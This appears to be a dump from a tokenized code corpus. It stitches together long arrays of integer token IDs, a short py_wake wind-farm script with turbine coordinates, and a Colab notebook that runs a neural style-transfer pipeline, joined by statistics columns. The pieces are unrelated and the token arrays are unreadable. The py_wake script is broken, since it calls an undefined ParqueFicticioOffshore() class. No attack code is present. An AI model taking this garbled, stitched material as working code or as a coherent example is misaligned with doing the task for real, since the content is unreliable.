37,
86,
7397,
87,
46,
48,
88,
35,
89,
11473,
5662,
41,
86,
41,
83,
421,
53,
48,
74,
40,
88,
86,
73,
86,
41,
79,
8610,
1018,
69,
53,
48,
86,
34,
4090,
89,
86,
19279,
35,
79,
34,
774,
77,
11012,
2724,
20185,
36820,
88,
48,
6,
198,
220,
220,
220,
1976,
2290,
50,
4579,
39,
2885,
76,
38374,
34,
87,
32,
28391,
44,
11012,
48587,
2777,
47920,
10227,
76,
33018,
38,
6968,
79,
7902,
27799,
78,
4579,
48,
10082,
1797,
43,
18504,
48,
37020,
3646,
33,
3019,
8205,
37,
4593,
796,
705,
929,
88,
48,
9865,
33,
20304,
2025,
41,
430,
53,
80,
56,
89,
54,
85,
41,
38,
35641,
5631,
84,
48,
74,
49,
29516,
40,
388,
86,
73,
4579,
16768,
76,
50,
41,
73,
23155,
39,
31166,
85,
21095,
2149,
78,
16632,
6998,
89,
18683,
6,
198,
220,
220,
220,
19534,
45,
86,
57,
7745,
41,
36326,
274,
39,
5796,
72,
39,
41,
89,
73,
45113,
48,
86,
55,
39,
85,
38,
7206,
48,
86,
48,
36,
78,
49,
83,
39,
5760,
907,
48,
893,
55,
87,
39,
11230,
83,
19238,
1130,
45,
81,
56,
53,
86,
40,
385,
796,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
3535,
86,
48,
37,
77,
38,
70,
33,
3861,
48,
76,
47772,
48,
37,
88,
43,
45,
80,
66,
56,
3978,
39386,
57,
19881,
31212,
85,
46,
78,
47,
74,
11012,
49,
76,
1581,
82,
38,
6173,
38,
86,
16768,
3698,
89,
54,
2767,
22556,
87,
38,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
21713,
41,
56,
5760,
4303,
22707,
87,
19499,
2238,
33018,
36,
86,
25093,
39,
482,
35,
85,
35,
45119,
32754,
14542,
41,
38,
47858,
1820,
41,
74,
47,
44817,
10913,
3528,
9419,
70,
742,
17511,
33,
71,
33866,
89,
44958,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
32,
48,
37,
86,
7397,
87,
46,
48,
88,
35,
89,
11473,
5662,
41,
86,
41,
83,
421,
53,
48,
74,
40,
88,
86,
73,
86,
41,
79,
8610,
1018,
69,
53,
48,
86,
34,
4090,
89,
86,
19279,
35,
79,
34,
774,
77,
11012,
2724,
20185,
36820,
88,
48,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
50,
89,
83,
315,
87,
85,
41,
79,
48,
3705,
50,
2953,
35504,
40914,
35,
69,
5080,
54,
85,
39,
1546,
8135,
41,
87,
10910,
41,
3483,
68,
37,
41,
4503,
3727,
75,
5247,
48,
37,
87,
47,
2885,
44817,
89,
5883,
26377,
35,
2417,
6,
198,
220,
220,
220,
2361,
198,
220,
220,
220,
329,
331,
76,
53,
25492,
45,
27481,
85,
86,
10295,
38475,
89,
385,
34,
21713,
86,
1137,
17931,
75,
16960,
37,
48,
29817,
67,
85,
38202,
56,
29138,
32178,
48,
46,
78,
17931,
3546,
429,
38,
3398,
11401,
6780,
49,
862,
56,
86,
287,
1976,
2290,
50,
4579,
39,
2885,
76,
38374,
34,
87,
32,
28391,
44,
11012,
48587,
2777,
47920,
10227,
76,
33018,
38,
6968,
79,
7902,
27799,
78,
4579,
48,
10082,
1797,
43,
18504,
48,
37020,
3646,
33,
3019,
8205,
37,
4593,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
287,
1195,
44,
13024,
35,
38,
824,
32,
6500,
56,
77,
47,
89,
83,
4426,
7156,
41,
16811,
72,
31554,
9078,
21800,
660,
48,
56,
15766,
48,
14529,
86,
39,
57,
77,
80,
48587,
4106,
38,
11401,
79,
41,
7399,
41275,
49,
897,
51,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
266,
86,
38,
404,
17931,
78,
44817,
3886,
53,
3620,
72,
33,
41,
14082,
85,
77,
74,
18429,
78,
32754,
7801,
57,
313,
4503,
36,
21373,
47858,
818,
87,
24723,
1503,
34382,
10080,
55,
2949,
39,
75,
39,
81,
73,
49,
774,
74,
6624,
1195,
660,
85,
45,
70,
50,
48,
16045,
41,
2943,
10161,
38,
14761,
20402,
32,
41,
89,
22125,
2724,
49,
13038,
80,
20802,
34049,
38,
14259,
89,
55,
1026,
6998,
87,
22764,
77,
37,
7501,
29567,
2389,
72,
4579,
39,
41,
45,
2417,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
796,
331,
76,
53,
25492,
45,
27481,
85,
86,
10295,
38475,
89,
385,
34,
21713,
86,
1137,
17931,
75,
16960,
37,
48,
29817,
67,
85,
38202,
56,
29138,
32178,
48,
46,
78,
17931,
3546,
429,
38,
3398,
11401,
6780,
49,
862,
56,
86,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1195,
660,
85,
45,
70,
50,
48,
16045,
41,
2943,
10161,
38,
14761,
20402,
32,
41,
89,
22125,
2724,
49,
13038,
80,
20802,
34049,
38,
14259,
89,
55,
1026,
6998,
87,
22764,
77,
37,
7501,
29567,
2389,
72,
4579,
39,
41,
45,
2417,
6624,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
796,
1976,
2290,
50,
4579,
39,
2885,
76,
38374,
34,
87,
32,
28391,
44,
11012,
48587,
2777,
47920,
10227,
76,
33018,
38,
6968,
79,
7902,
27799,
78,
4579,
48,
10082,
1797,
43,
18504,
48,
37020,
3646,
33,
3019,
8205,
37,
4593,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1195,
660,
85,
45,
70,
50,
48,
16045,
41,
2943,
10161,
38,
14761,
20402,
32,
41,
89,
22125,
2724,
49,
13038,
80,
20802,
34049,
38,
14259,
89,
55,
1026,
6998,
87,
22764,
77,
37,
7501,
29567,
2389,
72,
4579,
39,
41,
45,
2417,
796,
1976,
2290,
50,
4579,
39,
2885,
76,
38374,
34,
87,
32,
28391,
44,
11012,
48587,
2777,
47920,
10227,
76,
33018,
38,
6968,
79,
7902,
27799,
78,
4579,
48,
10082,
1797,
43,
18504,
48,
37020,
3646,
33,
3019,
8205,
37,
4593,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
287,
19534,
45,
86,
57,
7745,
41,
36326,
274,
39,
5796,
72,
39,
41,
89,
73,
45113,
48,
86,
55,
39,
85,
38,
7206,
48,
86,
48,
36,
78,
49,
83,
39,
5760,
907,
48,
893,
55,
87,
39,
11230,
83,
19238,
1130,
45,
81,
56,
53,
86,
40,
385,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1195,
44,
13024,
35,
38,
824,
32,
6500,
56,
77,
47,
89,
83,
4426,
7156,
41,
16811,
72,
31554,
9078,
21800,
660,
48,
56,
15766,
48,
14529,
86,
39,
57,
77,
80,
48587,
4106,
38,
11401,
79,
41,
7399,
41275,
49,
897,
51,
796,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
198,
16341,
35528,
25,
198,
220,
220,
220,
1208,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
36070,
54,
69,
48,
361,
87,
76,
73,
86,
39,
45,
74,
80,
71,
85,
77,
3109,
13909,
4669,
10295,
31212,
80,
39,
10652,
3727,
37,
79,
57,
37,
48,
50,
14636,
79,
48,
35,
11163,
38,
87,
8264,
12473,
42012,
45,
86,
36,
23593,
50,
41,
796,
705,
23286,
55,
1722,
4760,
774,
50,
41,
71,
37,
79,
2390,
87,
36,
69,
85,
893,
85,
71,
35,
12096,
25690,
88,
80,
3528,
75,
4090,
48,
47,
45006,
9908,
34,
3019,
56,
81,
57,
5840,
742,
76,
86,
4339,
17184,
3019,
80,
79,
36,
6,
198,
220,
220,
220,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
796,
705,
726,
7414,
70,
10761,
4579,
33,
89,
47,
84,
11909,
71,
42668,
2246,
33866,
76,
36287,
35,
76,
7285,
16960,
55,
38,
44179,
47,
3163,
47,
49044,
30098,
38,
48,
87,
4653,
84,
51,
40939,
41,
4093,
35,
36802,
10262,
9865,
84,
6,
198,
220,
220,
220,
474,
39,
82,
41,
70,
41473,
7836,
6998,
333,
25374,
84,
10761,
85,
35,
5222,
83,
4061,
73,
87,
6684,
9399,
56,
87,
46987,
80,
86,
12096,
81,
80,
48,
72,
20802,
40469,
18227,
37,
83,
73,
3978,
2749,
53,
88,
15916,
44,
7397,
796,
705,
83,
17931,
73,
41,
21713,
48,
3483,
10855,
74,
20474,
893,
3978,
87,
48,
41,
88,
17250,
50,
87,
70,
36,
38227,
53,
87,
32178,
76,
18429,
9139,
28047,
50,
48,
40,
1837,
10872,
17184,
75,
7355,
52,
89,
16811,
41,
79,
39,
79,
6,
198,
220,
220,
220,
256,
37,
8577,
39,
77,
40989,
12115,
4669,
49732,
89,
76,
5662,
41,
79,
10262,
49,
26145,
9697,
40,
72,
15199,
7112,
48,
37,
3705,
8579,
9865,
54,
46,
33866,
27624,
52,
89,
39,
5606,
25093,
34,
68,
38,
41,
80,
3861,
796,
705,
41,
39,
82,
37,
79,
10246,
37,
85,
40,
86,
56,
87,
47,
87,
50,
41697,
9273,
57,
81,
8416,
22495,
8905,
57,
54,
26141,
77,
47,
26001,
377,
85,
56,
16458,
72,
48587,
6968,
421,
30195,
10246,
82,
4720,
37,
48,
83,
18227,
87,
6,
198,
220,
220,
220,
308,
85,
36,
73,
33,
41,
7998,
87,
4503,
37,
86,
50,
41,
52,
41,
4579,
39,
69,
32754,
36802,
4061,
83,
52,
89,
421,
35,
74,
32,
28391,
86,
49,
18276,
709,
39,
41,
742,
16458,
37048,
30188,
88,
32754,
89,
45,
3727,
50,
5653,
796,
705,
41,
7708,
55,
7998,
49,
14082,
48,
36,
84,
48,
57,
32886,
55,
18429,
33,
55,
73,
31554,
39,
75,
89,
5080,
41,
36,
13909,
48274,
3109,
38475,
21373,
14313,
7278,
67,
37,
88,
37,
86,
42598,
89,
4948,
15571,
926,
39,
280,
40,
6,
198,
220,
220,
220,
611,
36070,
54,
69,
48,
361,
87,
76,
73,
86,
39,
45,
74,
80,
71,
85,
77,
3109,
13909,
4669,
10295,
31212,
80,
39,
10652,
3727,
37,
79,
57,
37,
48,
50,
14636,
79,
48,
35,
11163,
38,
87,
8264,
12473,
42012,
45,
86,
36,
23593,
50,
41,
287,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
25,
198,
220,
220,
220,
220,
220,
220,
220,
36070,
54,
69,
48,
361,
87,
76,
73,
86,
39,
45,
74,
80,
71,
85,
77,
3109,
13909,
4669,
10295,
31212,
80,
39,
10652,
3727,
37,
79,
57,
37,
48,
50,
14636,
79,
48,
35,
11163,
38,
87,
8264,
12473,
42012,
45,
86,
36,
23593,
50,
41,
796,
308,
85,
36,
73,
33,
41,
7998,
87,
4503,
37,
86,
50,
41,
52,
41,
4579,
39,
69,
32754,
36802,
4061,
83,
52,
89,
421,
35,
74,
32,
28391,
86,
49,
18276,
709,
39,
41,
742,
16458,
37048,
30188,
88,
32754,
89,
45,
3727,
50,
5653,
198,
220,
220,
220,
220,
220,
220,
220,
611,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
287,
474,
39,
82,
41,
70,
41473,
7836,
6998,
333,
25374,
84,
10761,
85,
35,
5222,
83,
4061,
73,
87,
6684,
9399,
56,
87,
46987,
80,
86,
12096,
81,
80,
48,
72,
20802,
40469,
18227,
37,
83,
73,
3978,
2749,
53,
88,
15916,
44,
7397,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
796,
256,
37,
8577,
39,
77,
40989,
12115,
4669,
49732,
89,
76,
5662,
41,
79,
10262,
49,
26145,
9697,
40,
72,
15199,
7112,
48,
37,
3705,
8579,
9865,
54,
46,
33866,
27624,
52,
89,
39,
5606,
25093,
34,
68,
38,
41,
80,
3861,
198,
220,
220,
220,
1288,
361,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
287,
36070,
54,
69,
48,
361,
87,
76,
73,
86,
39,
45,
74,
80,
71,
85,
77,
3109,
13909,
4669,
10295,
31212,
80,
39,
10652,
3727,
37,
79,
57,
37,
48,
50,
14636,
79,
48,
35,
11163,
38,
87,
8264,
12473,
42012,
45,
86,
36,
23593,
50,
41,
25,
198,
220,
220,
220,
220,
220,
220,
220,
474,
39,
82,
41,
70,
41473,
7836,
6998,
333,
25374,
84,
10761,
85,
35,
5222,
83,
4061,
73,
87,
6684,
9399,
56,
87,
46987,
80,
86,
12096,
81,
80,
48,
72,
20802,
40469,
18227,
37,
83,
73,
3978,
2749,
53,
88,
15916,
44,
7397,
796,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
198,
220,
220,
220,
220,
220,
220,
220,
611,
474,
39,
82,
41,
70,
41473,
7836,
6998,
333,
25374,
84,
10761,
85,
35,
5222,
83,
4061,
73,
87,
6684,
9399,
56,
87,
46987,
80,
86,
12096,
81,
80,
48,
72,
20802,
40469,
18227,
37,
83,
73,
3978,
2749,
53,
88,
15916,
44,
7397,
287,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
410,
38,
83,
16768,
80,
86,
3149,
89,
50,
41,
1565,
47,
87,
37,
13807,
19684,
45484,
912,
40,
54,
85,
87,
15200,
4146,
2032,
81,
52,
48,
34,
77,
36,
7801,
39,
13909,
71,
55,
36,
22556,
52,
2213,
49,
73,
5324,
55,
34223,
87,
796,
308,
85,
36,
73,
33,
41,
7998,
87,
4503,
37,
86,
50,
41,
52,
41,
4579,
39,
69,
32754,
36802,
4061,
83,
52,
89,
421,
35,
74,
32,
28391,
86,
49,
18276,
709,
39,
41,
742,
16458,
37048,
30188,
88,
32754,
89,
45,
3727,
50,
5653,
198,
220,
220,
220,
374,
8579,
4462,
39,
45,
69,
45,
80,
48,
75,
49,
8135,
36,
4720,
2749,
34382,
9414,
259,
33,
77,
21713,
41,
40,
34970,
7156,
49,
81,
41,
15821,
14969,
44,
8068,
49,
12889,
1133,
313,
38,
83,
46,
80,
48,
5064,
32754,
3419,
198
] | 1.419342 | 25,230 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 28 10:55:12 2021
@author: mikf
"""
import numpy as np
from py_wake.examples.data.ParqueFicticio import ParqueFicticio_path
from py_wake.site import WaspGridSite
from py_wake.site.xrsite import XRSite
x = np.asarray([262403., 262553., 262703., 262853., 263003., 263153., 263303.,
263453., 263603., 263753., 263903., 264053., 264203., 264353.,
264503., 264653., 264803., 264953., 265103., 265253.])
y = np.asarray([6504239., 6504389., 6504539., 6504689., 6504839., 6504989.,
6505139., 6505289., 6505439., 6505589., 6505739., 6505889.,
6506039., 6506189., 6506339., 6506489., 6506639., 6506789.,
6506939., 6507089.])
wt_x = np.asarray([264904, 264372, 263839, 264904, 264372, 263839, 263306,
264638, 264105, 263572, 263039, 264372, 263839, 263039, 264358,
263839, 263039, 263839, 263306, 262773, 263306, 262773, 263039])
wt_y = np.asarray([6505613, 6505016, 6504420, 6506063, 6505467, 6504870,
6504273, 6506215, 6505619, 6505022, 6504425, 6506368, 6505771,
6504876, 6506803, 6506221, 6505326, 6506672, 6506075, 6505478,
6506525, 6505929, 6506677])
x_min_d = x.min()
x_max_d = x.max()
y_min_d = y.min()
y_max_d = y.max()
boundary = np.asarray([[x_min_d, y_max_d], [x_max_d, y_max_d],
[x_max_d, y_min_d], [x_min_d, y_min_d]])
if __name__ == '__main__':
site = ParqueFicticioOffshore()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
2892,
7653,
2579,
838,
25,
2816,
25,
1065,
33448,
198,
198,
31,
9800,
25,
285,
1134,
69,
198,
37811,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
12972,
62,
48530,
13,
1069,
12629,
13,
7890,
13,
10044,
4188,
37,
713,
46441,
1330,
2547,
4188,
37,
713,
46441,
62,
6978,
198,
6738,
12972,
62,
48530,
13,
15654,
1330,
370,
5126,
41339,
29123,
198,
6738,
12972,
62,
48530,
13,
15654,
13,
87,
3808,
578,
1330,
1395,
6998,
578,
628,
198,
87,
796,
45941,
13,
292,
18747,
26933,
2075,
1731,
3070,
1539,
2608,
1495,
4310,
1539,
2608,
1983,
3070,
1539,
2608,
2078,
4310,
1539,
2608,
6200,
18,
1539,
39135,
21395,
1539,
39135,
22572,
1539,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2608,
27712,
18,
1539,
2608,
15277,
18,
1539,
2608,
22318,
18,
1539,
2608,
2670,
3070,
1539,
2608,
1821,
4310,
1539,
32158,
22416,
1539,
32158,
33319,
1539,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32158,
31938,
1539,
32158,
46435,
1539,
32158,
43564,
1539,
32158,
49649,
1539,
32090,
15197,
1539,
32090,
28592,
8183,
8,
198,
88,
796,
45941,
13,
292,
18747,
26933,
17544,
19,
23516,
1539,
22626,
19,
29769,
1539,
22626,
2231,
2670,
1539,
22626,
38472,
24,
1539,
22626,
2780,
2670,
1539,
22626,
2920,
4531,
1539,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22626,
20,
20219,
1539,
22626,
20,
27693,
1539,
22626,
4051,
2670,
1539,
22626,
2816,
4531,
1539,
22626,
3553,
2670,
1539,
22626,
3365,
4531,
1539,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22626,
1899,
2670,
1539,
22626,
21,
23362,
1539,
22626,
21,
29626,
1539,
22626,
2414,
4531,
1539,
22626,
2791,
2670,
1539,
22626,
3134,
4531,
1539,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22626,
3388,
2670,
1539,
22626,
2154,
4531,
8183,
8,
198,
46569,
62,
87,
796,
45941,
13,
292,
18747,
26933,
2075,
2920,
3023,
11,
32158,
36720,
11,
2608,
2548,
2670,
11,
32158,
24,
3023,
11,
32158,
36720,
11,
2608,
2548,
2670,
11,
39135,
20548,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
362,
27720,
2548,
11,
32158,
13348,
11,
2608,
2327,
4761,
11,
2608,
1270,
2670,
11,
32158,
36720,
11,
2608,
2548,
2670,
11,
2608,
1270,
2670,
11,
32158,
31128,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2608,
2548,
2670,
11,
2608,
1270,
2670,
11,
2608,
2548,
2670,
11,
39135,
20548,
11,
2608,
1983,
4790,
11,
39135,
20548,
11,
2608,
1983,
4790,
11,
2608,
1270,
2670,
12962,
198,
46569,
62,
88,
796,
45941,
13,
292,
18747,
26933,
17544,
3980,
1485,
11,
22626,
20,
27037,
11,
22626,
2598,
1238,
11,
22626,
1899,
5066,
11,
22626,
4051,
3134,
11,
22626,
2780,
2154,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22626,
19,
27367,
11,
22626,
5237,
1314,
11,
22626,
3980,
1129,
11,
22626,
1120,
1828,
11,
22626,
2598,
1495,
11,
22626,
21,
27412,
11,
22626,
20,
46761,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22626,
2780,
4304,
11,
22626,
37397,
18,
11,
22626,
21,
26115,
11,
22626,
4310,
2075,
11,
22626,
2791,
4761,
11,
22626,
1899,
2425,
11,
22626,
20,
29059,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
22626,
2996,
1495,
11,
22626,
3270,
1959,
11,
22626,
2791,
3324,
12962,
198,
198,
87,
62,
1084,
62,
67,
796,
2124,
13,
1084,
3419,
198,
87,
62,
9806,
62,
67,
796,
2124,
13,
9806,
3419,
198,
88,
62,
1084,
62,
67,
796,
331,
13,
1084,
3419,
198,
88,
62,
9806,
62,
67,
796,
331,
13,
9806,
3419,
198,
198,
7784,
560,
796,
45941,
13,
292,
18747,
26933,
58,
87,
62,
1084,
62,
67,
11,
331,
62,
9806,
62,
67,
4357,
685,
87,
62,
9806,
62,
67,
11,
331,
62,
9806,
62,
67,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
685,
87,
62,
9806,
62,
67,
11,
331,
62,
1084,
62,
67,
4357,
685,
87,
62,
1084,
62,
67,
11,
331,
62,
1084,
62,
67,
11907,
8,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
2524,
796,
2547,
4188,
37,
713,
46441,
9362,
14640,
3419,
198
] | 1.938209 | 793 |
# -*- coding: utf-8 -*-
"""Neural Style Pattern Transfer.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ijYjSvGfWm1aUkw0stn6P7U8pYwhsbU0
"""
#!nvcc --version
print("Your GPU is a ")
!nvidia-smi -L
print("GPU Logs")
print("Nvidia K80 is not enough to do past A5 for high res inputs and A7 for low res inputs")
print("Nvidia P100 will do an A8 in around 23 minutes")
from psutil import virtual_memory
ram_gb = virtual_memory().total / 1e9
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(ram_gb))
if ram_gb < 20:
print('Not using a high-RAM runtime')
else:
print('You are using a high-RAM runtime!')
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/ProGamerGov/neural-style-pt.git
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/channel_pruning.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nin_imagenet.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg16-00b39a1b.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg19-d01eb7cb.pth" /content/neural-style-pt/models/
!pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio===0.7.2 -f https://download.pytorch.org/whl/torch_stable.html
#---------#
# STYLE 1 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/1A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
